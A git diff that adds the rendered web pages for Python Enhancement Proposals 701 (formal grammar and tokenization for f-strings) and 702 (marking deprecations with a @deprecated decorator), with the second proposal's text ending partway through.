+ + + + + \ No newline at end of file diff --git a/pep-0701/index.html b/pep-0701/index.html new file mode 100644 index 00000000000..9b8c1de35c2 --- /dev/null +++ b/pep-0701/index.html @@ -0,0 +1,713 @@ + + + + + + + + PEP 701 – Syntactic formalization of f-strings | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 701 – Syntactic formalization of f-strings

+
+
Author:
+
Pablo Galindo <pablogsal at python.org>, +Batuhan Taskaya <batuhan at python.org>, +Lysandros Nikolaou <lisandrosnik at gmail.com>, +Marta Gómez Macías <cyberwitch at google.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Created:
+
15-Nov-2022
+
Python-Version:
+
3.12
+
Post-History:
+
19-Dec-2022
+
Resolution:
+
14-Mar-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document proposes to lift some of the restrictions originally formulated in +PEP 498 and to provide a formalized grammar for f-strings that can be +integrated into the parser directly. The proposed syntactic formalization of +f-strings will have some small side-effects on how f-strings are parsed and +interpreted, allowing for a considerable number of advantages for end users and +library developers, while also dramatically reducing the maintenance cost of +the code dedicated to parsing f-strings.

+
+
+

Motivation

+

When f-strings were originally introduced in PEP 498, the specification was +provided without providing a formal grammar for f-strings. Additionally, the +specification contains several restrictions that are imposed so the parsing of +f-strings could be implemented into CPython without modifying the existing +lexer. These limitations have been recognized previously and previous attempts +have been made to lift them in PEP 536, but none of this work was ever implemented. +Some of these limitations (collected originally by PEP 536) are:

+
    +
  1. It is impossible to use the quote character delimiting the f-string +within the expression portion:
    >>> f'Magic wand: { bag['wand'] }'
    +                             ^
    +SyntaxError: invalid syntax
    +
    +
    +
  2. +
  3. A previously considered way around it would lead to escape sequences +in executed code and is prohibited in f-strings:
    >>> f'Magic wand { bag[\'wand\'] } string'
    +SyntaxError: f-string expression portion cannot include a backslash
    +
    +
    +
  4. +
  5. Comments are forbidden even in multi-line f-strings:
    >>> f'''A complex trick: {
    +... bag['bag']  # recursive bags!
    +... }'''
    +SyntaxError: f-string expression part cannot include '#'
    +
    +
    +
  6. +
  7. Arbitrary nesting of expressions without expansion of escape sequences is +available in many other languages that employ a string interpolation +method that uses expressions instead of just variable names. Some examples:
    # Ruby
    +"#{ "#{1+2}" }"
    +
    +# JavaScript
    +`${`${1+2}`}`
    +
    +# Swift
    +"\("\(1+2)")"
    +
    +# C#
    +$"{$"{1+2}"}"
    +
    +
    +
  8. +
+

These limitations serve no purpose from a language user perspective and +can be lifted by giving f-string literals a regular grammar without exceptions +and implementing it using dedicated parse code.

+

The other issue that f-strings have is that the current implementation in +CPython relies on tokenising f-strings as STRING tokens and a post processing of +these tokens. This has the following problems:

+
    +
  1. It adds a considerable maintenance cost to the CPython parser. This is because +the parsing code needs to be written by hand, which has historically led to a +considerable number of inconsistencies and bugs. Writing and maintaining parsing +code by hand in C has always been considered error prone and dangerous as it needs +to deal with a lot of manual memory management over the original lexer buffers.
  2. +
  3. The f-string parsing code is not able to use the new improved error message mechanisms +that the new PEG parser, originally introduced in PEP 617, has allowed. The +improvements that these error messages brought has been greatly celebrated but +unfortunately f-strings cannot benefit from them because they are parsed in a +separate piece of the parsing machinery. This is especially unfortunate, since +there are several syntactical features of f-strings that can be confusing due +to the different implicit tokenization that happens inside the expression +part (for instance f"{y:=3}" is not an assignment expression).
  4. +
  5. Other Python implementations have no way to know if they have implemented +f-strings correctly because contrary to other language features, they are not +part of the official Python grammar. +This is important because several prominent +alternative implementations are using CPython’s PEG parser, such as PyPy, +and/or are basing their grammars on the official PEG grammar. The +fact that f-strings use a separate parser prevents these alternative implementations +from leveraging the official grammar and benefiting from improvements in error messages derived +from the grammar.
  6. +
+

A version of this proposal was originally discussed on Python-Dev and +presented at the Python Language Summit 2022 where it was enthusiastically +received.

+
+
+

Rationale

+

By building on top of the new Python PEG Parser (PEP 617), this PEP proposes +to redefine “f-strings”, especially emphasizing the clear separation of the +string component and the expression (or replacement, {...}) component. PEP 498 +summarizes the syntactical part of “f-strings” as the following:

+
+
In Python source code, an f-string is a literal string, prefixed with ‘f’, which +contains expressions inside braces. The expressions are replaced with their values.
+

However, PEP 498 also contained a formal list of exclusions on what +can or cannot be contained inside the expression component (primarily due to the +limitations of the existing parser). By clearly establishing the formal grammar, we +now also have the ability to define the expression component of an f-string as truly “any +applicable Python expression” (in that particular context) without being bound +by the limitations imposed by the details of our implementation.

+

The formalization effort and the premise above also has a significant benefit for +Python programmers due to its ability to simplify and eliminate the obscure +limitations. This reduces the mental burden and the cognitive complexity of +f-string literals (as well as the Python language in general).

+
    +
  1. The expression component can include any string literal that a normal Python expression +can include. This opens up the possibility of nesting string literals (formatted or +not) inside the expression component of an f-string with the same quote type (and length):
    >>> f"These are the things: {", ".join(things)}"
    +
    +>>> f"{source.removesuffix(".py")}.c: $(srcdir)/{source}"
    +
    +>>> f"{f"{f"infinite"}"}" + " " + f"{f"nesting!!!"}"
    +
    +
    +

    This “feature” is not universally agreed to be desirable, and some users find this unreadable. +For a discussion on the different views on this, see the considerations regarding quote reuse section.

    +
  2. +
  3. Another issue that has felt unintuitive to most is the lack of support for backslashes +within the expression component of an f-string. One example that keeps coming up is including +a newline character in the expression part for joining containers. For example:
    >>> a = ["hello", "world"]
    +>>> f"{'\n'.join(a)}"
    +File "<stdin>", line 1
    +    f"{'\n'.join(a)}"
    +                    ^
    +SyntaxError: f-string expression part cannot include a backslash
    +
    +
    +

    A common work-around for this was to either assign the newline to an intermediate variable or +pre-create the whole string prior to creating the f-string:

    +
    >>> a = ["hello", "world"]
    +>>> joined = '\n'.join(a)
    +>>> f"{joined}"
    +'hello\nworld'
    +
    +
    +

    It only feels natural to allow backslashes in the expression part now that the new PEG parser +can easily support it.

    +
    >>> a = ["hello", "world"]
    +>>> f"{'\n'.join(a)}"
    +'hello\nworld'
    +
    +
    +
  4. +
  5. Before the changes proposed in this document, there was no explicit limit in +how f-strings can be nested, but the fact that string quotes cannot be reused +inside the expression component of f-strings made it impossible to nest +f-strings arbitrarily. In fact, this is the most nested-fstring that can be +written:
    >>> f"""{f'''{f'{f"{1+1}"}'}'''}"""
    +'2'
    +
    +
    +

    As this PEP allows placing any valid Python expression inside the +expression component of the f-strings, it is now possible to reuse quotes and +therefore is possible to nest f-strings arbitrarily:

    +
    >>> f"{f"{f"{f"{f"{f"{1+1}"}"}"}"}"}"
    +'2'
    +
    +
    +

    Although this is just a consequence of allowing arbitrary expressions, the +authors of this PEP do not believe that this is a fundamental benefit and we +have decided that the language specification will not explicitly mandate that +this nesting can be arbitrary. This is because allowing arbitrarily-deep +nesting imposes a lot of extra complexity to the lexer implementation +(particularly as lexer/parser pipelines need to allow “untokenizing” to +support the ‘f-string debugging expressions’ and this is especially taxing when +arbitrary nesting is allowed). Implementations are therefore free to impose a +limit on the nesting depth if they need to. Note that this is not an uncommon +situation, as the CPython implementation already imposes several limits all +over the place, including a limit on the nesting depth of parentheses and +brackets, a limit on the nesting of the blocks, a limit in the number of +branches in if statements, a limit on the number of expressions in +star-unpacking, etc.

    +
  6. +
+
+
+

Specification

+

The formal proposed PEG grammar specification for f-strings is (see PEP 617 +for details on the syntax):

+
fstring
+    | FSTRING_START fstring_middle* FSTRING_END
+fstring_middle
+    | fstring_replacement_field
+    | FSTRING_MIDDLE
+fstring_replacement_field
+    | '{' (yield_expr | star_expressions) "="? [ "!" NAME ] [ ':' fstring_format_spec* ] '}'
+fstring_format_spec:
+    | FSTRING_MIDDLE
+    | fstring_replacement_field
+
+
+

The new tokens (FSTRING_START, FSTRING_MIDDLE, FSTRING_END) are defined +later in this document.

+

This PEP leaves up to the implementation the level of f-string nesting allowed +(f-strings within the expression parts of other f-strings) but specifies a +lower bound of 5 levels of nesting. This is to ensure that users can have a +reasonable expectation of being able to nest f-strings with “reasonable” depth. +This PEP implies that limiting nesting is not part of the language +specification but also the language specification doesn’t mandate arbitrary +nesting.

+

Similarly, this PEP leaves up to the implementation the level of expression nesting +in format specifiers but specifies a lower bound of 2 levels of nesting. This means +that the following should always be valid:

+
f"{'':*^{1:{1}}}"
+
+
+

but the following can be valid or not depending on the implementation:

+
f"{'':*^{1:{1:{1}}}}"
+
+
+

The new grammar will preserve the Abstract Syntax Tree (AST) of the current +implementation. This means that no semantic changes will be introduced by this +PEP on existing code that uses f-strings.

+
+

Handling of f-string debug expressions

+

Since Python 3.8, f-strings can be used to debug expressions by using the += operator. For example:

+
>>> a = 1
+>>> f"{1+1=}"
+'1+1=2'
+
+
+

This semantics were not introduced formally in a PEP and they were implemented +in the current string parser as a special case in bpo-36817 and documented in +the f-string lexical analysis section.

+

This feature is not affected by the changes proposed in this PEP but is +important to specify that the formal handling of this feature requires the lexer +to be able to “untokenize” the expression part of the f-string. This is not a +problem for the current string parser as it can operate directly on the string +token contents. However, incorporating this feature into a given parser +implementation requires the lexer to keep track of the raw string contents of +the expression part of the f-string and make them available to the parser when +the parse tree is constructed for f-string nodes. A pure “untokenization” is not +enough because as specified currently, f-string debug expressions preserve whitespace in the expression, +including spaces after the { and the = characters. This means that the +raw string contents of the expression part of the f-string must be kept intact +and not just the associated tokens.

+

How parser/lexer implementations deal with this problem is of course up to the +implementation.

+
+
+

New tokens

+

Three new tokens are introduced: FSTRING_START, FSTRING_MIDDLE and +FSTRING_END. Different lexers may have different implementations that may be +more efficient than the ones proposed here given the context of the particular +implementation. However, the following definitions will be used as part of the +public APIs of CPython (such as the tokenize module) and are also provided +as a reference so that the reader can have a better understanding of the +proposed grammar changes and how the tokens are used:

+
    +
  • FSTRING_START: This token includes the f-string prefix (f/F/fr) and the opening quote(s).
  • +
  • FSTRING_MIDDLE: This token includes a portion of text inside the string that’s not part of the +expression part and isn’t an opening or closing brace. This can include the text between the opening quote +and the first expression brace ({), the text between two expression braces (} and {) and the text +between the last expression brace (}) and the closing quote.
  • +
  • FSTRING_END: This token includes the closing quote.
  • +
+

These tokens are always string parts and they are semantically equivalent to the +STRING token with the restrictions specified. These tokens must be produced by the lexer +when lexing f-strings. This means that the tokenizer cannot produce a single token for f-strings anymore. +How the lexer emits this token is not specified as this will heavily depend on every +implementation (even the Python version of the lexer in the standard library is implemented +differently to the one used by the PEG parser).

+

As an example:

+
f'some words {a+b:.3f} more words {c+d=} final words'
+
+
+

will be tokenized as:

+
FSTRING_START - "f'"
+FSTRING_MIDDLE - 'some words '
+LBRACE - '{'
+NAME - 'a'
+PLUS - '+'
+NAME - 'b'
+OP - ':'
+FSTRING_MIDDLE - '.3f'
+RBRACE - '}'
+FSTRING_MIDDLE - ' more words '
+LBRACE - '{'
+NAME - 'c'
+PLUS - '+'
+NAME - 'd'
+OP - '='
+RBRACE - '}'
+FSTRING_MIDDLE - ' final words'
+FSTRING_END - "'"
+
+
+

while f"""some words""" will be tokenized simply as:

+
FSTRING_START - 'f"""'
+FSTRING_MIDDLE - 'some words'
+FSTRING_END - '"""'
+
+
+
+
+

Changes to the tokenize module

+

The tokenize module will be adapted to emit these tokens as described in the previous section +when parsing f-strings so tools can take advantage of this new tokenization schema and avoid having +to implement their own f-string tokenizer and parser.

+
+
+

How to produce these new tokens

+

One way existing lexers can be adapted to emit these tokens is to incorporate a +stack of “lexer modes” or to use a stack of different lexers. This is because +the lexer needs to switch from “regular Python lexing” to “f-string lexing” when +it encounters an f-string start token and as f-strings can be nested, the +context needs to be preserved until the f-string closes. Also, the “lexer mode” +inside an f-string expression part needs to behave as a “super-set” of the +regular Python lexer (as it needs to be able to switch back to f-string lexing +when it encounters the } terminator for the expression part as well as +handling f-string formatting and debug expressions). For reference, here is a +draft of the algorithm to modify a CPython-like tokenizer to emit these new +tokens:

+
    +
  1. If the lexer detects that an f-string is starting (by detecting the letter +‘f/F’ and one of the possible quotes) keep advancing until a valid quote is +detected (one of ", """, ' or ''') and emit a +FSTRING_START token with the contents captured (the ‘f/F’ and the +starting quote). Push a new tokenizer mode to the tokenizer mode stack for +“F-string tokenization”. Go to step 2.
  2. +
  3. Keep consuming tokens until a one of the following is encountered:
      +
    • A closing quote equal to the opening quote.
    • +
    • If in “format specifier mode” (see step 3), an opening brace ({), a +closing brace (}), or a newline token (\n).
    • +
    • If not in “format specifier mode” (see step 3), an opening brace ({) or +a closing brace (}) that is not immediately followed by another opening/closing +brace.
    • +
    +

    In all cases, if the character buffer is not empty, emit a FSTRING_MIDDLE +token with the contents captured so far but transform any double +opening/closing braces into single opening/closing braces. Now, proceed as +follows depending on the character encountered:

    +
      +
    • If a closing quote matching the opening quite is encountered go to step 4.
    • +
    • If an opening bracket (not immediately followed by another opening bracket) +is encountered, go to step 3.
    • +
    • If a closing bracket (not immediately followed by another closing bracket) +is encountered, emit a token for the closing bracket and go to step 2.
    • +
    +
  4. +
  5. Push a new tokenizer mode to the tokenizer mode stack for “Regular Python +tokenization within f-string” and proceed to tokenize with it. This mode +tokenizes as the “Regular Python tokenization” until a : or a } +character is encountered with the same level of nesting as the opening +bracket token that was pushed when we enter the f-string part. Using this mode, +emit tokens until one of the stop points are reached. When this happens, emit +the corresponding token for the stopping character encountered and, pop the +current tokenizer mode from the tokenizer mode stack and go to step 2. If the +stopping point is a : character, enter step 2 in “format specifier” mode.
  6. +
  7. Emit a FSTRING_END token with the contents captured and pop the current +tokenizer mode (corresponding to “F-string tokenization”) and go back to +“Regular Python mode”.
  8. +
+

Of course, as mentioned before, it is not possible to provide a precise +specification of how this should be done for an arbitrary tokenizer as it will +depend on the specific implementation and nature of the lexer to be changed.

+
+
+

Consequences of the new grammar

+

All restrictions mentioned in the PEP are lifted from f-string literals, as explained below:

+
    +
  • Expression portions may now contain strings delimited with the same kind of +quote that is used to delimit the f-string literal.
  • +
  • Backslashes may now appear within expressions just like anywhere else in +Python code. In case of strings nested within f-string literals, escape sequences are +expanded when the innermost string is evaluated.
  • +
  • New lines are now allowed within expression brackets. This means that these are now allowed:
    >>> x = 1
    +>>> f"___{
    +...     x
    +... }___"
    +'___1___'
    +
    +>>> f"___{(
    +...     x
    +... )}___"
    +'___1___'
    +
    +
    +
  • +
  • Comments, using the # character, are allowed within the expression part of an f-string. +Note that comments require that the closing bracket (}) of the expression part to be present in +a different line as the one the comment is in or otherwise it will be ignored as part of the comment.
  • +
+
+
+

Considerations regarding quote reuse

+

One of the consequences of the grammar proposed here is that, as mentioned above, +f-string expressions can now contain strings delimited with the same kind of quote +that is used to delimit the external f-string literal. For example:

+
>>> f" something { my_dict["key"] } something else "
+
+
+

In the discussion thread for this PEP, +several concerns have been raised regarding this aspect and we want to collect them here, +as these should be taken into consideration when accepting or rejecting this PEP.

+

Some of these objections include:

+
    +
  • Many people find quote reuse within the same string confusing and hard to read. This is because +allowing quote reuse will violate a current property of Python as it stands today: the fact that +strings are fully delimited by two consecutive pairs of the same kind of quote, which by itself is a very simple rule. +One of the reasons quote reuse may be harder for humans to parse, leading to less readable +code, is that the quote character is the same for both start and +end (as opposed to other delimiters).
  • +
  • Some users have raised concerns that quote reuse may break some lexer and syntax highlighting tools that rely +on simple mechanisms to detect strings and f-strings, such as regular expressions or simple delimiter +matching tools. Introducing quote reuse in f-strings will either make it trickier to keep these tools +working or will break the tools altogether (as, for instance, regular expressions cannot parse arbitrary nested +structures with delimiters). The IDLE editor, included in the standard library, is an example of a +tool which may need some work to correctly apply syntax highlighting to f-strings.
  • +
+

Here are some of the arguments in favour:

+
    +
  • Many languages that allow similar syntactic constructs (normally called “string interpolation”) allow quote +reuse and arbitrary nesting. These languages include JavaScript, Ruby, C#, Bash, Swift and many others. +The fact that many languages allow quote reuse can be a compelling argument in favour of allowing it in Python. This +is because it will make the language more familiar to users coming from other languages.
  • +
  • As many other popular languages allow quote reuse in string interpolation constructs, this means that editors +that support syntax highlighting for these languages will already have the necessary tools to support syntax +highlighting for f-strings with quote reuse in Python. This means that although the files that handle syntax +highlighting for Python will need to be updated to support this new feature, is not expected to be impossible +or very hard to do.
  • +
  • One advantage of allowing quote reuse is that it composes cleanly with other syntax. Sometimes this is referred to +as “referential transparency”. An example of this is that if we have f(x+1), assuming a is a brand new variable, it +should behave the same as a = x+1; f(a). And vice versa. So if we have:
    def py2c(source):
    +    prefix = source.removesuffix(".py")
    +    return f"{prefix}.c"
    +
    +
    +

    It should be expected that if we replace the variable prefix with its definition, the answer should be the same:

    +
    def py2c(source):
    +    return f"{source.removesuffix(".py")}.c"
    +
    +
    +
  • +
  • Code generators (like ast.unparse from standard library) in their +current form rely on complicated algorithms to ensure expressions within an f-string are properly suited for the context in +which they are being used. These non-trivial algorithms come with challenges such as finding an unused quote type (by tracking +the outer quotes), and generating string representations which would not include backslashes if possible. Allowing quote reuse +and backslashes would simplify the code generators which deal with f-strings considerably, as the regular Python expression logic +can be used inside and outside of f-strings without any special treatment.
  • +
  • Limiting quote reuse will considerably increase the complexity of the implementation of the proposed changes. This is because +it will force the parser to have the context that is parsing an expression part of an f-string with a given quote in order +to know if it needs to reject an expression that reuses the quote. Carrying this context around is not trivial in parsers that +can backtrack arbitrarily (such as the PEG parser). The issue becomes even more complex if we consider that f-strings can be +arbitrarily nested and therefore several quote types may need to be rejected.

    To gather feedback from the community, +a poll +has been initiated to get a sense of how the community feels about this aspect of the PEP.

    +
  • +
+
+
+
+

Backwards Compatibility

+

This PEP does not introduce any backwards incompatible syntactic or semantic changes +to the Python language. However, the tokenize module (a quasi-public part of the standard +library) will need to be updated to support the new f-string tokens (to allow tool authors +to correctly tokenize f-strings). See changes to the tokenize module for more details regarding +how the public API of tokenize will be affected.

+
+
+

How to Teach This

+

As the concept of f-strings is already ubiquitous in the Python community, there is +no fundamental need for users to learn anything new. However, as the formalized grammar +allows some new possibilities, it is important that the formal grammar is added to the +documentation and explained in detail, explicitly mentioning what constructs are possible +since this PEP is aiming to avoid confusion.

+

It is also beneficial to provide users with a simple framework for understanding what can +be placed inside an f-string expression. In this case the authors think that this work will +make it even simpler to explain this aspect of the language, since it can be summarized as:

+
+
You can place any valid Python expression inside an f-string expression.
+

With the changes in this PEP, there is no need to clarify that string quotes are +limited to be different from the quotes of the enclosing string, because this is +now allowed: as an arbitrary Python string can contain any possible choice of +quotes, so can any f-string expression. Additionally there is no need to clarify +that certain things are not allowed in the expression part because of +implementation restrictions such as comments, new line characters or +backslashes.

+

The only “surprising” difference is that as f-strings allow specifying a +format, expressions that allow a : character at the top level still need to be +enclosed in parenthesis. This is not new to this work, but it is important to +emphasize that this restriction is still in place. This allows for an easier +modification of the summary:

+
+
You can place any valid Python expression inside +an f-string expression, and everything after a : character at the top level will +be identified as a format specification.
+
+
+

Reference Implementation

+

A reference implementation can be found in the implementation fork.

+
+
+

Rejected Ideas

+
    +
  1. Although we think the readability arguments that have been raised against +allowing quote reuse in f-string expressions are valid and very important, +we have decided to propose not rejecting quote reuse in f-strings at the parser +level. The reason is that one of the cornerstones of this PEP is to reduce the +complexity and maintenance of parsing f-strings in CPython and this will not +only work against that goal, but it may even make the implementation even more +complex than the current one. We believe that forbidding quote reuse should be +done in linters and code style tools and not in the parser, the same way other +confusing or hard-to-read constructs in the language are handled today.
  2. +
  3. We have decided not to lift the restriction that some expression portions +need to wrap ':' and '!' in parentheses at the top level, e.g.:
    >>> f'Useless use of lambdas: { lambda x: x*2 }'
    +SyntaxError: unexpected EOF while parsing
    +
    +
    +

    The reason is that this will introduce a considerable amount of +complexity for no real benefit. This is due to the fact that the : character +normally separates the f-string format specification. This format specification +is currently tokenized as a string. As the tokenizer MUST tokenize what’s on the +right of the : as either a string or a stream of tokens, this won’t allow the +parser to differentiate between the different semantics as that would require the +tokenizer to backtrack and produce a different set of tokens (this is, first try +as a stream of tokens, and if it fails, try as a string for a format specifier).

    +

    As there is no fundamental advantage in being able to allow lambdas and similar +expressions at the top level, we have decided to keep the restriction that these must +be parenthesized if needed:

    +
    >>> f'Useless use of lambdas: { (lambda x: x*2) }'
    +
    +
    +
  4. +
  5. We have decided to disallow (for the time being) using escaped braces (\{ and \}) +in addition to the {{ and }} syntax. Although the authors of the PEP believe that +allowing escaped braces is a good idea, we have decided to not include it in this PEP, as it is not strictly +necessary for the formalization of f-strings proposed here, and it can be +added independently in a regular CPython issue.
  6. +
+
+
+

Open Issues

+

None yet

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0701.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0702/index.html b/pep-0702/index.html new file mode 100644 index 00000000000..ec7a0e9d5e7 --- /dev/null +++ b/pep-0702/index.html @@ -0,0 +1,496 @@ + + + + + + + + PEP 702 – Marking deprecations using the type system | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 702 – Marking deprecations using the type system

+
+
Author:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
30-Dec-2022
+
Python-Version:
+
3.13
+
Post-History:
+
01-Jan-2023, +22-Jan-2023
+
Resolution:
+
07-Nov-2023
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see @deprecated and +@warnings.deprecated for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP adds an @warnings.deprecated() decorator that marks a class or function +as deprecated, enabling static checkers to warn when it is used. By default, this +decorator will also raise a runtime DeprecationWarning.

+
+
+

Motivation

+

As software evolves, new functionality is added and old functionality becomes +obsolete. Library developers want to work towards removing obsolete code while +giving their users time to migrate to new APIs. Python provides a mechanism for +achieving these goals: the DeprecationWarning warning class, which is +used to show warnings when deprecated functionality is used. This mechanism is +widely used: as of the writing of this PEP, the CPython main branch contains +about 150 distinct code paths that raise DeprecationWarning. Many +third-party libraries also use DeprecationWarning to mark deprecations. +In the top 5000 PyPI packages, +there are:

+
    +
  • 1911 matches for the regex warnings\.warn.*\bDeprecationWarning\b, +indicating use of DeprecationWarning (not including cases where the +warning is split over multiple lines);
  • +
  • 1661 matches for the regex ^\s*@deprecated, indicating use of some sort of +deprecation decorator.
  • +
+

However, the current mechanism is often insufficient to ensure that users +of deprecated functionality update their code in time. For example, the +removal of various long-deprecated unittest features had to be +reverted +from Python 3.11 to give users more time to update their code. +Users may run their test suite with warnings disabled for practical reasons, +or deprecations may be triggered in code paths that are not covered by tests.

+

Providing more ways for users to find out about deprecated functionality +can speed up the migration process. This PEP proposes to leverage static type +checkers to communicate deprecations to users. Such checkers have a thorough +semantic understanding of user code, enabling them to detect and report +deprecations that a single grep invocation could not find. In addition, many type +checkers integrate with IDEs, enabling users to see deprecation warnings +right in their editors.

+
+
+

Rationale

+

At first glance, deprecations may not seem like a topic that type checkers should +touch. After all, type checkers are concerned with checking whether code will +work as is, not with potential future changes. However, the analysis that type +checkers perform on code to find type errors is very similar to the analysis +that would be needed to detect usage of many deprecations. Therefore, type +checkers are well placed to find and report deprecations.

+

Other languages already have similar functionality:

+
    +
  • GCC supports a deprecated attribute +on function declarations. This powers CPython’s Py_DEPRECATED macro.
  • +
  • GraphQL supports +marking fields as @deprecated.
  • +
  • Kotlin supports +a Deprecated annotation.
  • +
  • Scala supports +an @deprecated annotation.
  • +
  • Swift supports +using the @available attribute to mark APIs as deprecated.
  • +
  • TypeScript uses +the @deprecated JSDoc tag to issue a hint marking use of +deprecated functionality.
  • +
+

Several users have requested support for such a feature:

+ +

There are similar existing third-party tools:

+
    +
  • Deprecated provides a decorator to +mark classes, functions, or methods as deprecated. Access to decorated objects +raises a runtime warning, but is not detected by type checkers.
  • +
  • flake8-deprecated is a linter +plugin that warns about use of deprecated features. However, it is limited to +a short, hard-coded list of deprecations.
  • +
+
+
+

Specification

+

A new decorator @deprecated() is added to the warnings module. This +decorator can be used on a class, function or method to mark it as deprecated. +This includes typing.TypedDict and typing.NamedTuple definitions. +With overloaded functions, the decorator may be applied to individual overloads, +indicating that the particular overload is deprecated. The decorator may also be +applied to the overload implementation function, indicating that the entire function +is deprecated.

+

The decorator takes the following arguments:

+
    +
  • A required positional-only argument representing the deprecation message.
  • +
  • Two keyword-only arguments, category and stacklevel, controlling +runtime behavior (see under “Runtime behavior” below).
  • +
+

The positional-only argument is of type str and contains a message that should +be shown by the type checker when it encounters a usage of the decorated object. +Tools may clean up the deprecation message for display, for example +by using inspect.cleandoc() or equivalent logic. +The message must be a string literal. +The content of deprecation messages is up to the user, but it may include the version +in which the deprecated object is to be removed, and information about suggested +replacement APIs.

+

Type checkers should produce a diagnostic whenever they encounter a usage of an +object marked as deprecated. For deprecated overloads, this includes all calls +that resolve to the deprecated overload. +For deprecated classes and functions, this includes:

+
    +
  • References through module, class, or instance attributes (module.deprecated_object, +module.SomeClass.deprecated_method, module.SomeClass().deprecated_method)
  • +
  • Any usage of deprecated objects in their defining module +(x = deprecated_object() in module.py)
  • +
  • If import * is used, usage of deprecated objects from the +module (from module import *; x = deprecated_object())
  • +
  • from imports (from module import deprecated_object)
  • +
  • Any syntax that indirectly triggers a call to the function. For example, +if the __add__ method of a class C is deprecated, then +the code C() + C() should trigger a diagnostic. Similarly, if the +setter of a property is marked deprecated, attempts to set the property +should trigger a diagnostic.
  • +
+

If a method is marked with the typing.override() decorator from PEP 698 +and the base class method it overrides is deprecated, the type checker should +produce a diagnostic.

+

There are additional scenarios where deprecations could come into play. +For example, an object may implement a typing.Protocol, but one +of the methods required for protocol compliance is deprecated. +As scenarios such as this one appear complex and relatively unlikely to come up in practice, +this PEP does not mandate that type checkers detect them.

+
+

Example

+

As an example, consider this library stub named library.pyi:

+
from warnings import deprecated
+
+@deprecated("Use Spam instead")
+class Ham: ...
+
+@deprecated("It is pining for the fiords")
+def norwegian_blue(x: int) -> int: ...
+
+@overload
+@deprecated("Only str will be allowed")
+def foo(x: int) -> str: ...
+@overload
+def foo(x: str) -> str: ...
+
+class Spam:
+    @deprecated("There is enough spam in the world")
+    def __add__(self, other: object) -> object: ...
+
+    @property
+    @deprecated("All spam will be equally greasy")
+    def greasy(self) -> float: ...
+
+    @property
+    def shape(self) -> str: ...
+    @shape.setter
+    @deprecated("Shapes are becoming immutable")
+    def shape(self, value: str) -> None: ...
+
+
+

Here is how type checkers should handle usage of this library:

+
from library import Ham  # error: Use of deprecated class Ham. Use Spam instead.
+
+import library
+
+library.norwegian_blue(1)  # error: Use of deprecated function norwegian_blue. It is pining for the fiords.
+map(library.norwegian_blue, [1, 2, 3])  # error: Use of deprecated function norwegian_blue. It is pining for the fiords.
+
+library.foo(1)  # error: Use of deprecated overload for foo. Only str will be allowed.
+library.foo("x")  # no error
+
+ham = Ham()  # no error (already reported above)
+
+spam = library.Spam()
+spam + 1  # error: Use of deprecated method Spam.__add__. There is enough spam in the world.
+spam.greasy  # error: Use of deprecated property Spam.greasy. All spam will be equally greasy.
+spam.shape  # no error
+spam.shape = "cube"  # error: Use of deprecated property setter Spam.shape. Shapes are becoming immutable.
+
+
+

The exact wording of the diagnostics is up to the type checker and is not part +of the specification.

+
+
+

Runtime behavior

+

In addition to the positional-only message argument, +the @deprecated decorator takes two keyword-only arguments:

+
    +
  • category: A warning class. Defaults to DeprecationWarning. If this +is set to None, no warning is issued at runtime and the decorator returns +the original object, except for setting the __deprecated__ attribute (see below).
  • +
  • stacklevel: The number of stack frames to skip when issuing the warning. +Defaults to 1, indicating that the warning should be issued at the site where the +deprecated object is called. Internally, the implementation will add the number of +stack frames it uses in wrapper code.
  • +
+

If the decorated object is a class, the decorator wraps the __new__ method +such that instantiating the class issues a warning. If the decorated object is a +callable, the decorator returns a new callable that wraps the original callable but +raises a warning when called. Otherwise, the decorator raises a TypeError +(unless category=None is passed).

+

There are several scenarios where use of the decorated object cannot issue a warning, +including overloads, Protocol classes, and abstract methods. Type checkers may show a +warning if @deprecated is used without category=None in these cases.

+

To accommodate runtime introspection, the decorator sets an attribute +__deprecated__ on the object it is passed, as well as on the wrapper +callables it generates for deprecated classes and functions. +The value of the attribute is the message passed to the decorator. +Decorating objects that do not allow setting this attribute is not supported.

+

If a Protocol with the @runtime_checkable decorator is marked as deprecated, +the __deprecated__ attribute should not be considered a member of the protocol, +so its presence should not affect isinstance checks.

+

For compatibility with typing.get_overloads(), the @deprecated +decorator should be placed after the @overload decorator.

+
+
+

Type checker behavior

+

This PEP does not specify exactly how type checkers should present deprecation +diagnostics to their users. However, some users (e.g., application developers +targeting only a specific version of Python) may not care about deprecations, +while others (e.g., library developers who want their library to remain +compatible with future versions of Python) would want to catch any use of +deprecated functionality in their CI pipeline. Therefore, it is recommended +that type checkers provide configuration options that cover both use cases. +As with any other type checker error, it is also possible to ignore deprecations +using # type: ignore comments.

+
+
+

Deprecation policy

+

We propose that CPython’s deprecation policy (PEP 387) is updated to require that new deprecations +use the functionality in this PEP to alert users +about the deprecation, if possible. Concretely, this means that new +deprecations should be accompanied by a change to the typeshed repo to +add the @deprecated decorator in the appropriate place. +This requirement does not apply to deprecations that cannot be expressed +using this PEP’s functionality.

+
+
+
+

Backwards compatibility

+

Creating a new decorator poses no backwards compatibility concerns. +As with all new typing functionality, the @deprecated decorator +will be added to the typing_extensions module, enabling its use +in older versions of Python.

+
+
+

How to teach this

+

